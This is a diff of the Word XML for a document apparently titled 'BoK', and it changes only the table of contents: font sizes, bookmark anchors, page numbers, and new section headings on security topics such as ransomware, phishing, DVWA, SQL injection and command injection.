--- a/BoK.docx
+++ b/BoK.docx
@@ -227,8 +227,8 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorBidi"/>
           <w:color w:val="auto"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:id w:val="1584718509"/>
@@ -250,13 +250,25 @@
             <w:pStyle w:val="TOCHeading"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
           </w:pPr>
           <w:r>
             <w:rPr>
               <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
-            <w:t>Contents</w:t>
+            <w:t>Table of C</w:t>
+          </w:r>
+          <w:r>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
+            </w:rPr>
+            <w:t>ontent</w:t>
           </w:r>
         </w:p>
         <w:p>
@@ -274,22 +286,28 @@
           <w:r>
             <w:rPr>
               <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:fldChar w:fldCharType="begin"/>
           </w:r>
           <w:r>
             <w:rPr>
               <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
           </w:r>
           <w:r>
             <w:rPr>
               <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:sz w:val="24"/>
+              <w:szCs w:val="24"/>
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc113407010" w:history="1">
+          <w:hyperlink w:anchor="_Toc113747821" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -320,7 +338,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113407010 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747821 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -367,7 +385,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113407011" w:history="1">
+          <w:hyperlink w:anchor="_Toc113747822" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -398,7 +416,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113407011 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747822 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -445,7 +463,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113407012" w:history="1">
+          <w:hyperlink w:anchor="_Toc113747823" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -476,7 +494,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113407012 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747823 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -518,18 +536,20 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113407013" w:history="1">
+          <w:hyperlink w:anchor="_Toc113747824" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
-              </w:rPr>
-              <w:t>Path Traversal and Command Injection</w:t>
+                <w:lang w:val="en-AS"/>
+              </w:rPr>
+              <w:t>Exercises &amp; Challenges</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -553,7 +573,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113407013 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747824 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -576,7 +596,244 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747825" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Ransomware</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747825 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747826" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>Phishing</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747826 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747827" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:lang w:val="en-AS"/>
+              </w:rPr>
+              <w:t>Host Intrusion Detection and Prevention System (HIDS)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747827 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -595,16 +852,174 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
               <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113407014" w:history="1">
+          <w:hyperlink w:anchor="_Toc113747828" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                 <w:noProof/>
+                <w:lang w:val="en-AS"/>
+              </w:rPr>
+              <w:t>DVWA (Damn Vulnerable Web Application)</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747828 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747829" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Path Traversal</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747829 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747830" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>Brute Force</w:t>
             </w:r>
@@ -630,7 +1045,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113407014 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747830 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -653,7 +1068,163 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>9</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747831" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>SQL injection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747831 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747832" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Command Injection</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747832 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>15</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -677,7 +1248,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113407015" w:history="1">
+          <w:hyperlink w:anchor="_Toc113747833" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -708,7 +1279,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113407015 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747833 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -731,7 +1302,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>19</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -755,7 +1326,7 @@
               <w:lang w:eastAsia="en-GB"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc113407016" w:history="1">
+          <w:hyperlink w:anchor="_Toc113747834" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -786,7 +1357,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc113407016 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc113747834 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -809,7 +1380,86 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>8</w:t>
+              <w:t>19</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="majorBidi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+              <w:noProof/>
+              <w:lang w:eastAsia="en-GB"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc113747835" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:lang w:val="en-AS"/>
+              </w:rPr>
+              <w:t>References</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
